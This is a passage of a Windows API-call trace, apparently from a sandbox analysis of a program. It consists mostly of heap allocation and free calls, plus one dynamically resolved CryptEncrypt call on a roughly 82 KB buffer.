lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0153.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0153.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0153.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0153.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0153.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0153.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0153.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0153.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0153.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b30 [0153.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0153.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0153.718] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0153.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0153.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e541c0 [0153.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0153.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0153.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0153.719] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14106, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14108) returned 1 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0153.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0153.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0153.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0153.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.723] CharLowerBuffW (in: lpsz="byte[82184]", cchLength=0xb | out: lpsz="byte[82184]") returned 0xb [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0153.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0153.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0153.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.729] HeapFree (in: 